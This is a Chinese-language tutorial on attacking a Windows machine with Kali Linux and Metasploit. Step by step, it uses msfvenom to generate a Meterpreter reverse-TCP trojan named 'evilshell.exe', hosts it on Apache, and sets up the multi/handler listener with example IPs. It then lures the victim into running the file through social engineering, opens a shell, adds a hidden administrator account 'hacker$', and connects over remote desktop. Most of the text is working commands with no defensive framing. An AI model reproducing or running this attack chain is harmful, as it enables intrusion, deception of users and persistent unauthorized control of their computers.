Kali系统基于Debian的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BackTrack),其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发,使用非常方便,进入工具的方式:msfconsole,MSF依赖于Postgresql数据库,在使用MSF前要开启该数据库
1. 生成木马,通过msfvenom
msfvenom -p(后加payload) windows/meterpreter/reverse_tcp lhost=kali's ip(攻击者的ip) lport=5555(端口号) -f exe > ./root/desktop/evilshell.exe
-p 参数后加payload,攻击成功后要做什么事情
lhost 后跟监听的ip
lport 后跟监听的端口
-f 后跟要生成的后门文件的类型
2. 将木马文件evilshell.exe拷贝到/var/www/html,开启apache,在肉鸡上开启浏览器访问kali的ip,点击evilshell.exe将文件保存至windows桌面
3. 开启postgresql(端口5432),/etc/init.d/postgresql start,输入msfconsole进入msf服务
/etc/init.d/postgresql start
=[ metasploit v5.0.46-dev ] + -- --=[ 1921 exploits - 1075 auxiliary - 330 post ] + -- --=[ 556 payloads - 45 encoders - 10 nops ] + -- --=[ 4 evasion ]
exploits:开发利用,攻击某些服务、平台、系统等用到的工具
payload:载荷载体,攻击成功后要操作什么
4.加载exploits和payloads,查看该模块需要设置的参数,这里的路径要和上面生成木马时的payload一致
msf5>use exploit/multi/handler 选择exploits msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 设置payload show options 查看所需设置的参数
输入命令后会出现所需设置的参数,将lhost与lport设置为与生成木马时一样
set lhost kali的IP 设置监听地址 set lport 5555 设置监听端口 run 或者exploit 运行攻击模块
例:
Msf5>use exploit/multi/handler
Msf5>exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
Msf5>exploit(multi/handler) >show options
Msf5>exploit(multi/handler) >set lhost 192.168.217.136
Msf5>exploit(multi/handler) >set lport 5555
5.在肉鸡中诱导用户点击exe程序(社会工程学攻击),在kali中会得到肉鸡的shell(meterpreter)
点击后在kali中
meterpreter > shell 获取目标主机的shell
Net user hacker$ root /add 创建新用户并将该用户密码设置为root
Net localgroup administrators hacker$ /add 将用户添加至管理员组中
net user host$ 查看host$用户信息
在kali中重新开启一个终端,rdesktop 192.168.217.134 使用远程桌面连接目标主机(默认端口为3389)如果失败需要在目标主机上开启